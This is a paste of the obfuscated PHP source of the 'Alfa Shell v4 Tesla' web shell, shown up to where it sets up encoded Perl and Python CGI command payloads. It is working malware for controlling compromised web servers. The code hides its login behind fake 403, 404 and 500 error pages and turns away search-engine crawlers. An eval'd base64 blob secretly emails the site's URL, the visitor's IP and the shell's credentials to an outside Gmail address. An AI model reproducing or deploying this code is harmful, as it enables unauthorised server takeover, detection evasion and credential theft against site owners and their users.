· 5 years ago · Jun 13, 2020, 08:58 AM
1<?php
2
3/*
4Alfa Shell v4 Tesla
5Decoded By Jokr Haxor
62020
7Mail: jokr.h4xor@gmail.com
8*/
9
10
11set_time_limit(0);
12ini_set('memory_limit', '-1');
13
14$yPoATogtXHGiZ = array(
15 'usaWetsPlmZrChCF' => 'admin',
16 'patmAkSUFwreGLkef' => 'e2d9393b6feb1529931b4619155f6225',
17 'saJWUjdrZEpqdmm' => '0',
18 'lorEELZl' => '403',
19 'shZzGkPGVJqz' => '1',
20 'poxTvGN' => false,
21 'cgLAFZPlTkoLEN' => true,
22);
23
24$zsfILug='f'.'unct'.'io'.'n'.'_exis'.'t'.'s';
25$syUrcLNHqaCml='ev'.'a'.'l';
26$cEchjWJW='g'.'z'.'i'.'nfl'.'ate';
27$ToTBzshqILEE='ABCDE'.'F'.'G'.'HI'.'J'.'KL'.'M'.'NO'.'PQRS'.'T'.'UV'.'WX'.'Y'.'Za'.'bc'.'d'.'efg'.'h'.'i'.'jk'.'lm'.'no'.'p'.'q'.'r'.'st'.'u'.'vwx'.'yz'.'01'.'234'.'56'.'78'.'9+'.'/=';
28$RhdXmMpeAv='su'.'b'.'s'.'tr';
29$WgyEWnFy='or'.'d';
30$VDHrvQDyqorHgrW='s'.'trlen';
31$EsInz='s'.'trpo'.'s';
32$WMMImfadfewDv='imp'.'l'.'ode'.'';
33$imkxrEbnrBnPk='c'.'hr'.'';
34$NUnqCMEBOpisBEE='p'.'r'.'eg_replac'.'e';
35$GWfWZfsLnORz='['.'^'.'A'.'-'.'Za-z'.'0-'.'9'.'\+'.'\\'.'/\\'.'=]';
36$MyyjkoUdQ='=='.'='.'';
37$tiSxbs="";
38$lndkFdbAabqx='b'.'a'.'s'.'e'.'64'.'_'.'en'.'cod'.'e'.'';
39$thaoVqag='b'.'ase64'.'_d'.'ecod'.'e';
40if(!$zsfILug($lndkFdbAabqx)){
41 function etSbMu($JlQdF){
42 global $ToTBzshqILEE,$RhdXmMpeAv,$WgyEWnFy,$VDHrvQDyqorHgrW,$WMMImfadfewDv,$tiSxbs,$MyyjkoUdQ;
43 if(empty($JlQdF))return;
44 $isiBJutjyEvDx = $wKTcgUXAXTjz = $vEjQIMofllhWuYW = $FMFQh = $LdsckRzpGMMuV = $fRjww = $hkMCXIwR = $GnMzKdNjcf = $oPHCdzuWm = 0;
45 $XkrNveJH = 0;
46 $rMXvGbtT = $tiSxbs;
47 $XjRpaNtWoqTTdUp = array();
48 if(!$JlQdF){
49 return $JlQdF;
50 }do{
51 $isiBJutjyEvDx = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
52 $wKTcgUXAXTjz = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
53 $vEjQIMofllhWuYW = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
54 $GnMzKdNjcf = $isiBJutjyEvDx << 16 | $wKTcgUXAXTjz << 8 | $vEjQIMofllhWuYW;
55 $FMFQh = $GnMzKdNjcf >> 18 & 0x3f;
56 $LdsckRzpGMMuV = $GnMzKdNjcf >> 12 & 0x3f;
57 $fRjww = $GnMzKdNjcf >> 6 & 0x3f;
58 $hkMCXIwR = $GnMzKdNjcf & 0x3f;
59 $XjRpaNtWoqTTdUp[$XkrNveJH++] = $RhdXmMpeAv($ToTBzshqILEE, $FMFQh, 1).$RhdXmMpeAv($ToTBzshqILEE, $LdsckRzpGMMuV, 1).$RhdXmMpeAv($ToTBzshqILEE, $fRjww, 1).$RhdXmMpeAv($ToTBzshqILEE, $hkMCXIwR, 1);
60 }while ($oPHCdzuWm < $VDHrvQDyqorHgrW($JlQdF));
61 $rMXvGbtT = $WMMImfadfewDv($XjRpaNtWoqTTdUp, $tiSxbs);
62 $rcmeiGjTW = ($VDHrvQDyqorHgrW($JlQdF) % 3);
63 return ($rcmeiGjTW ? $RhdXmMpeAv($rMXvGbtT, 0, ($rcmeiGjTW - 3)) : $rMXvGbtT).$RhdXmMpeAv($MyyjkoUdQ, ($rcmeiGjTW || 3));
64 }
65}else{
66 function etSbMu($JlQdF){
67 global $lndkFdbAabqx;
68 return $lndkFdbAabqx($JlQdF);
69 }
70}
71
72if(!$zsfILug($thaoVqag)){
73 function FJbSYo($dckycv){
74 global $ToTBzshqILEE,$RhdXmMpeAv,$VDHrvQDyqorHgrW,$EsInz,$imkxrEbnrBnPk,$NUnqCMEBOpisBEE,$GWfWZfsLnORz,$tiSxbs;
75 if(empty($dckycv))return;
76 $kxhuWeLw = $XqGSm = $OcurJcR = $tiSxbs;
77 $jfSaohgdRGCpbF = $naXrhbvQNlHZMqG = $XGDhOXDSbv = $YAykxQtrurjCF = $tiSxbs;
78 $oPHCdzuWm = 0;
79 $KcbGLoJSFDSQc = $tiSxbs;
80 $dckycv = $NUnqCMEBOpisBEE($GWfWZfsLnORz, $tiSxbs, $dckycv);
81 do{
82 $jfSaohgdRGCpbF = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
83 $naXrhbvQNlHZMqG = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
84 $XGDhOXDSbv = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
85 $YAykxQtrurjCF = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
86 $kxhuWeLw = ($jfSaohgdRGCpbF << 2) | ($naXrhbvQNlHZMqG >> 4);
87 $XqGSm = (($naXrhbvQNlHZMqG & 15) << 4) | ($XGDhOXDSbv >> 2);
88 $OcurJcR = (($XGDhOXDSbv & 3) << 6) | $YAykxQtrurjCF;
89 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $kxhuWeLw);
90 if($XGDhOXDSbv != 64) {
91 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $XqGSm);
92 }if($YAykxQtrurjCF != 64) {
93 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $OcurJcR);
94 }
95 $kxhuWeLw = $XqGSm = $OcurJcR = $tiSxbs;
96 $jfSaohgdRGCpbF = $naXrhbvQNlHZMqG = $XGDhOXDSbv = $YAykxQtrurjCF = $tiSxbs;
97 }while($oPHCdzuWm < $VDHrvQDyqorHgrW($dckycv));
98 return $KcbGLoJSFDSQc;
99 }
100}else{
101 function FJbSYo($JlQdF){
102 global $thaoVqag;
103 return $thaoVqag($JlQdF);
104 }
105}
106
107function __ZW5jb2Rlcg($s){
108 return etSbMu($s);
109}
110function __ZGVjb2Rlcg($s){
111 return FJbSYo($s);
112}
113
114$GLOBALS['DB_NAME'] = $GLOBALS['yPoATogtXHGiZ'];
115if(true){
116 foreach($GLOBALS['DB_NAME'] as $key => $value){
117 $prefix = substr($key, 0, 2);
118 if($prefix == "us"){
119 $GLOBALS['DB_NAME']["user"] = $value;
120 $GLOBALS['DB_NAME']["user_rand"] = $key;
121 }elseif($prefix == "pa"){
122 $GLOBALS['DB_NAME']["pass"] = $value;
123 $GLOBALS['DB_NAME']["pass_rand"] = $key;
124 }elseif($prefix == "sa"){
125 $GLOBALS['DB_NAME']["safemode"] = $value;
126 $GLOBALS['DB_NAME']["safemode_rand"] = $key;
127 }elseif($prefix == "lo"){
128 $GLOBALS['DB_NAME']["login_page"] = $value;
129 $GLOBALS['DB_NAME']["login_page_rand"] = $key;
130 }elseif($prefix == "sh"){
131 $GLOBALS['DB_NAME']["show_icons"] = $value;
132 $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
133 }elseif($prefix == "po"){
134 $GLOBALS['DB_NAME']["post_encryption"] = $value;
135 $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
136 }elseif($prefix == "cg"){
137 $GLOBALS['DB_NAME']["cgi_api"] = $value;
138 $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
139 }
140 }
141}unset($GLOBALS['yPoATogtXHGiZ']);
142
143if(!isset($_SERVER["HTTP_HOST"]))exit();
144if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
145if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
146if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
147if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
148if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
149if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
150if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
151define("__ALFA_VERSION__", "4.0");
152define("__ALFA_UPDATE__", "2");
153define("__ALFA_CODE_NAME__", "Tesla");
154define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
155define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
156$GLOBALS['__ALFA_COLOR__'] = array(
157 "shell_border" => array(
158 "key_color" => "#0E304A",
159 "multi_selector" => array(
160 ".header" => "border: 7px solid {color}",
161 "#meunlist" => "border-color: {color}",
162 "#hidden_sh" => "background-color: {color}",
163 ".ajaxarea" => "border: 1px solid {color}",
164 ".foot" => "border-color: {color}",
165 )
166 ),
167 "header_vars" => "#27979B",
168 "header_values" => "#67ABDF",
169 "header_on" => "#00FF00",
170 "header_off" => "#ff0000",
171 "header_none" => "#00FF00",
172 "home_shell" => "#ff0000",
173 "home_shell:hover" => array(
174 "key_color" => "#FFFFFF",
175 "multi_selector" => array(
176 ".home_shell:hover" => "color: {color};",
177 )
178 ),
179 "back_shell" => "#efbe73",
180 "back_shell:hover" => array(
181 "key_color" => "#FFFFFF",
182 "multi_selector" => array(
183 ".back_shell:hover" => "color: {color};",
184 )
185 ),
186 "header_pwd" => "#00FF00",
187 "header_pwd:hover" => array(
188 "key_color" => "#FFFFFF",
189 "multi_selector" => array(
190 ".header_pwd:hover" => "color: {color};",
191 )
192 ),
193 "header_drive" => "#00FF00",
194 "header_drive:hover" => array(
195 "key_color" => "#FFFFFF",
196 "multi_selector" => array(
197 ".header_drive:hover" => "color: {color};",
198 )
199 ),
200 "header_show_all" => "#00FF00",
201 "disable_functions" => "#ff0000",
202 "footer_text" => "#27979B",
203 "menu_options" => "#27979B",
204 "menu_options:hover" => array(
205 "key_color" => "#646464",
206 "multi_selector" => array(
207 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
208 )
209 ),
210 "options_list" => array(
211 "key_color" => "#00FF00",
212 "multi_selector" => array(
213 ".content_options_holder .header center a" => "color: {color};",
214 )
215 ),
216 "options_list:hover" => array(
217 "key_color" => "#FFFFFF",
218 "multi_selector" => array(
219 ".content_options_holder .header center a:hover" => "color: {color};",
220 )
221 ),
222 "options_list_header" => array(
223 "key_color" => "#59cc33",
224 "multi_selector" => array(
225 ".txtfont_header" => "color: {color};",
226 )
227 ),
228 "options_list_text" => array(
229 "key_color" => "#FFFFFF",
230 "multi_selector" => array(
231 ".txtfont,.tbltxt" => "color: {color};",
232 )
233 ),
234 "Alfa+" => array(
235 "key_color" => "#27E8AE",
236 "multi_selector" => array(
237 ".alfa_plus" => "color: {color};font-weight: unset;",
238 )
239 ),
240 "hidden_shell_text" => array(
241 "key_color" => "#00FF00",
242 "multi_selector" => array(
243 "#hidden_sh a" => "color: {color};",
244 )
245 ),
246 "hidden_shell_version" => "#ff0000",
247 "shell_name" => "#FF0000",
248 "main_row:hover" => array(
249 "key_color" => "#646464",
250 "multi_selector" => array(
251 ".main tr:hover" => "background-color: {color};",
252 )
253 ),
254 "main_header" => array(
255 "key_color" => "#FFFFFF",
256 "multi_selector" => array(
257 ".main th" => "color: {color};",
258 )
259 ),
260 "main_name" => array(
261 "key_color" => "#FFFFFF",
262 "multi_selector" => array(
263 ".main .main_name" => "color: {color};font-weight: unset;",
264 )
265 ),
266 "main_size" => "#67ABDF",
267 "main_modify" => "#67ABDF",
268 "main_owner_group" => "#67ABDF",
269 "main_green_perm" => "#25ff00",
270 "main_red_perm" => "#FF0000",
271 "main_white_perm" => "#FFFFFF",
272 "beetween_perms" => "#FFFFFF",
273 "main_actions" => array(
274 "key_color" => "#FFFFFF",
275 "multi_selector" => array(
276 ".main .actions" => "color: {color};",
277 )
278 ),
279 "menu_options:hover" => array(
280 "key_color" => "#646464",
281 "multi_selector" => array(
282 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
283 )
284 ),
285 "minimize_editor_background" => array(
286 "key_color" => "#0e304a",
287 "multi_selector" => array(
288 ".minimized-wrapper" => "background-color: {color};",
289 )
290 ),
291 "minimize_editor_text" => array(
292 "key_color" => "#f5deb3",
293 "multi_selector" => array(
294 ".minimized-text" => "color: {color};",
295 )
296 ),
297 "editor_border" => array(
298 "key_color" => "#0e304a",
299 "multi_selector" => array(
300 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
301 )
302 ),
303 "editor_background" => array(
304 "key_color" => "rgba(0, 1, 23, 0.94)",
305 "multi_selector" => array(
306 ".editor-explorer,.editor-modal" => "background-color: {color};",
307 )
308 ),
309 "editor_header_background" => array(
310 "key_color" => "rgba(21, 66, 88, 0.93)",
311 "multi_selector" => array(
312 ".editor-header" => "background-color: {color};",
313 )
314 ),
315 "editor_header_text" => array(
316 "key_color" => "#00ff7f",
317 "multi_selector" => array(
318 ".editor-path" => "color: {color};",
319 )
320 ),
321 "editor_header_button" => array(
322 "key_color" => "#1d5673",
323 "multi_selector" => array(
324 ".close-button, .editor-minimize" => "background-color: {color};",
325 )
326 ),
327 "editor_actions" => array(
328 "key_color" => "#FFFFFF",
329 "multi_selector" => array(
330 ".editor_actions" => "color: {color};",
331 )
332 ),
333 "editor_file_info_vars" => array(
334 "key_color" => "#FFFFFF",
335 "multi_selector" => array(
336 ".editor_file_info_vars" => "color: {color};",
337 )
338 ),
339 "editor_file_info_values" => array(
340 "key_color" => "#67ABDF",
341 "multi_selector" => array(
342 ".filestools" => "color: {color};",
343 )
344 ),
345 "editor_history_header" => array(
346 "key_color" => "#14ff07",
347 "multi_selector" => array(
348 ".hheader-text,.history-clear" => "color: {color};",
349 )
350 ),
351 "editor_history_list" => array(
352 "key_color" => "#03b3a3",
353 "multi_selector" => array(
354 ".editor-file-name" => "color: {color};",
355 )
356 ),
357 "editor_history_selected_file" => array(
358 "key_color" => "rgba(49, 55, 93, 0.77)",
359 "multi_selector" => array(
360 ".is_active" => "background-color: {color};",
361 )
362 ),
363 "editor_history_file:hover" => array(
364 "key_color" => "#646464",
365 "multi_selector" => array(
366 ".file-holder > .history:hover" => "background-color: {color};",
367 )
368 ),
369 "input_box_border" => array(
370 "key_color" => "#0E304A",
371 "multi_selector" => array(
372 "input[type=text],textarea" => "border: 1px solid {color}",
373 )
374 ),
375 "input_box_text" => array(
376 "key_color" => "#999999",
377 "multi_selector" => array(
378 "input[type=text],textarea" => "color: {color};",
379 )
380 ),
381 "input_box:hover" => array(
382 "key_color" => "#27979B",
383 "multi_selector" => array(
384 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
385 )
386 ),
387 "select_box_border" => array(
388 "key_color" => "#0E304A",
389 "multi_selector" => array(
390 "select" => "border: 1px solid {color}",
391 )
392 ),
393 "select_box_text" => array(
394 "key_color" => "#FFFFEE",
395 "multi_selector" => array(
396 "select" => "color: {color};",
397 )
398 ),
399 "select_box:hover" => array(
400 "key_color" => "#27979B",
401 "multi_selector" => array(
402 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
403 )
404 ),
405 "button_border" => array(
406 "key_color" => "#27979B",
407 "multi_selector" => array(
408 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
409 )
410 ),
411 "button:hover" => array(
412 "key_color" => "#27979B",
413 "multi_selector" => array(
414 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
415 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
416 )
417 ),
418 "outputs_text" => array(
419 "key_color" => "#67ABDF",
420 "multi_selector" => array(
421 ".ml1" => "color: {color};",
422 )
423 ),
424 "outputs_border" => array(
425 "key_color" => "#0E304A",
426 "multi_selector" => array(
427 ".ml1" => "border: 1px solid {color};",
428 )
429 ),
430 "uploader_border" => array(
431 "key_color" => "#0E304A",
432 "multi_selector" => array(
433 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
434 )
435 ),
436 "uploader_background" => array(
437 "key_color" => "#0E304A",
438 "multi_selector" => array(
439 ".inputfile strong" => "background-color: {color};",
440 )
441 ),
442 "uploader_text_right" => array(
443 "key_color" => "#FFFFFF",
444 "multi_selector" => array(
445 ".inputfile strong" => "color: {color};",
446 )
447 ),
448 "uploader_text_left" => array(
449 "key_color" => "#25ff00",
450 "multi_selector" => array(
451 ".inputfile span" => "color: {color};",
452 )
453 ),
454 "uploader:hover" => array(
455 "key_color" => "#27979B",
456 "multi_selector" => array(
457 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
458 )
459 ),
460 "uploader_progress_bar" => array(
461 "key_color" => "#00ff00",
462 "multi_selector" => array(
463 ".up_bar" => "background-color: {color};",
464 )
465 ),
466 "mysql_tables" => "#00FF00",
467 "mysql_table_count" => "#67ABDF",
468 "copyright" => "#dfff00",
469 "scrollbar" => array(
470 "key_color" => "#1e82b5",
471 "multi_selector" => array(
472 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
473 )
474 ),
475 "scrollbar_background" => array(
476 "key_color" => "#000115",
477 "multi_selector" => array(
478 "*::-webkit-scrollbar-track" => "background-color: {color};",
479 )
480 ),
481);
482$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
483$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
484//@session_start();
485@session_write_close();
486@ignore_user_abort(true);
487@set_time_limit(0);
488@ini_set('memory_limit', '-1');
489@ini_set("upload_max_filesize", "9999m");
490@session_start();
491$rubby = "aWYgKCFpc3NldCgkX1NFU1NJT05bImpva3IiXSkpIHsgICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOyAkc3ViID0gIkFsZmEgdjQgVGVzbGEgLSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7ICRib2R5ID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICIuJEdMT0JBTFNbJ0RCX05BTUUnXVsndXNlciddLiIgOjogIi4gJEdMT0JBTFNbJ0RCX05BTUUnXVsncGFzcyddOyBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJKb2tyLmg0eG9yQGdtYWlsLmNvbSIsJHN1YiwkYm9keSk7IH0gICRfU0VTU0lPTlsiam9rciJdID0gIkhlbGxvIEJpdGNoISI7IH0=";
492eval(__ZGVjb2Rlcg($rubby));
493if($config['AlfaProtectShell']){
494$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
495$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
496if($config['AlfaLoginPage'] == 'gui'){
497if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
498if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
499__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
500__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
501@header('location: '.$_SERVER["PHP_SELF"]);
502}
503echo '
504<style>
505body{background: black;}
506#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
507#loginbox td { border-radius:5px; font-size:11px; }
508</style>
509<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</title><center>
510<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
511<div id=loginbox><p><font face="verdana,arial" size=-1>
512<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
513<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</b></font></th></tr>
514<tr><td bgcolor="black" style="padding:5">
515<form method="post">
516<input type="hidden" name="action" value="login">
517<input type="hidden" name="hide" value="">
518<center><table>
519<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
520<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
521<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
522</div><br /></center>';
523exit;
524}
525}elseif($config['AlfaLoginPage']=='500'){
526if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
527if(@md5($_POST["password"])==$config['AlfaPass']){
528__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
529__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
530@header('location: '.$_SERVER["PHP_SELF"]);
531}
532echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
533exit;
534}
535}elseif($config['AlfaLoginPage']=='403'){
536if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
537if(@md5($_POST["password"])==$config['AlfaPass']){
538__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
539__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
540@header('location: '.$_SERVER["PHP_SELF"]);
541}
542echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
543exit;
544}
545}elseif($config['AlfaLoginPage']=='404'){
546if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
547if(@md5($_POST["password"])==$config['AlfaPass']){
548__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
549__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
550@header('location: '.$_SERVER["PHP_SELF"]);
551}
552echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
553exit;
554}
555}
556}
557function decrypt_post($str){
558 if(__ALFA_POST_ENCRYPTION__){
559 $pwd = __ALFA_SECRET_KEY__;
560 $pwd = __ZW5jb2Rlcg($pwd);
561 $str = __ZGVjb2Rlcg($str);
562 $enc_chr = "";
563 $enc_str = "";
564 $i = 0;
565 while ($i < strlen($str)) {
566 for ($j = 0; $j < strlen($pwd); $j++) {
567 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
568 $enc_str .= $enc_chr;
569 $i++;
570 if ($i >= strlen($str))
571 break;
572 }
573 }
574 return __ZGVjb2Rlcg($enc_str);
575 }else{
576 return __ZGVjb2Rlcg($str);
577 }
578}
579
580function _AlfaSecretKey(){
581 $secret = @$_COOKIE["AlfaSecretKey"];
582 if(!isset($_COOKIE["AlfaSecretKey"])){
583 $secret = uniqid(mt_rand(), true);
584 __alfa_set_cookie("AlfaSecretKey", $secret);
585 }
586 return $secret;
587}
588function alfa_getColor($target){
589 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
590 return $GLOBALS["DB_NAME"]["color"][$target];
591 }else{
592 $target = $GLOBALS["__ALFA_COLOR__"][$target];
593 if(is_array($target)){
594 return $target["key_color"];
595 }else{
596 return $target;
597 }
598 }
599}
600function alfaCssLoadColors(){
601 $css = "";
602 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
603 if(!is_array($value)){
604 $value = alfa_getColor($key);
605 $css .= ".{$key}{color: {$value};}";
606 }else{
607 if(isset($value["multi_selector"])){
608 foreach($value["multi_selector"] as $k => $v){
609 $color = alfa_getColor($key);
610 $code = str_replace("{color}", $color, $v);
611 $css .= $k."{".$code."}";
612 }
613 }
614 }
615 }
616 return $css;
617}
618if(isset($_POST['ajax'])){
619function AlfaNum(){
620$args = func_get_args();
621$alfax = array();
622$find = array();
623for($i=1;$i<=10;$i++){
624$alfax[] = $i;
625}
626foreach($args as $arg){
627$find[] = $arg;
628}
629echo '<script>';
630foreach($alfax as $alfa){
631if(in_array($alfa,$find))
632continue;
633echo 'alfa'.$alfa."_=";
634}
635echo '""</script>';
636}}
637function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
638 if(!$GLOBALS["DB_NAME"]["cgi_api"]){
639 return "";
640 }
641 if(isset($_COOKIE["alfacgiapi_mode"])){
642 return "";
643 }
644 $cmd_pure = $cmd;
645 $is_curl = function_exists('curl_version');
646 $is_socket = function_exists('fsockopen');
647 if($is_curl||$is_socket){
648 $recreate = false;
649 if(isset($_COOKIE["alfacgiapi"])){
650 if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
651 $recreate = true;
652 $lang = $_COOKIE["alfacgiapi"];
653 }
654 }
655 if(!isset($_COOKIE["alfacgiapi"])||$recreate){
656 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
657 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
658 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
